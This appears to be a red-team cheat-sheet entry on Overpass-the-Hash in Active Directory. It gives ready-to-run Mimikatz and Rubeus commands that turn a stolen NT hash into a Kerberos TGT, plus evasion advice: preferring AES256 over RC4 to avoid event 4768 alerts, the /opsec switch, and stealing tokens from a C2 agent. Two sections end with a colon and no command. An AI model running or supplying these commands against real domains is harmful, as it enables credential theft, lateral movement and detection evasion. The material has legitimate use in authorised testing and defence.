Overpass-the-Hash

Mimikatz

Create a new process with dummy creds (Logon type 9), open the LSASS process and patch the new logon session's credential material with the supplied NT hash. From then on Kerberos authentication kicks off as if the user had logged on with the real password, turning the supplied hash into a fully-fledged TGT on first use. This needs local admin rights (privilege::debug) and a handle to LSASS, which most EDRs will flag; sekurlsa::pth also accepts /aes128 and /aes256 keys in place of /ntlm:

Cmd > .\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::pth /user:snovvcrash /domain:megacorp.local /run:c:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /ntlm:fc525c9683e8fe067095ba2ddc971889" "exit"

Rubeus

Create a sacrificial process (Logon type 9), legitimately ask the KDC for a TGT, import it into the new process and interact with that process (requires an elevated context):

Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /password:Passw0rd! /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show
Cmd > .\Rubeus.exe asktgt /domain:megacorp.local /dc:dc1 /user:snovvcrash /rc4:fc525c9683e8fe067095ba2ddc971889 /createnetonly:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe /show
If operating Rubeus from a C2 agent, you can steal_token into the sacrificial process instead of using the /show option.

Create a new process with dummy creds (Logon type 9) manually (runas /netonly), then use Rubeus with the user's NT hash to ask for a TGT and import it into that process's logon session:

A more opsec-safe approach is to use the AES256 key (KeyType 0x12) instead of RC4-HMAC (KeyType 0x17): in a domain where AES is the norm, an RC4 AS-REQ stands out in event 4768 (Ticket Encryption Type 0x17). Combine it with the /opsec switch, which makes Rubeus first send an AS-REQ without pre-authentication (expecting KDC_ERR_PREAUTH_REQUIRED) and only then the pre-authenticated one, mimicking a genuine Windows client (Rubeus expects /opsec to be used together with /aes256). Note that the AES key cannot be derived from the NT hash; you need the plaintext (Rubeus hash) or the key itself from DCSync or an LSASS dump:
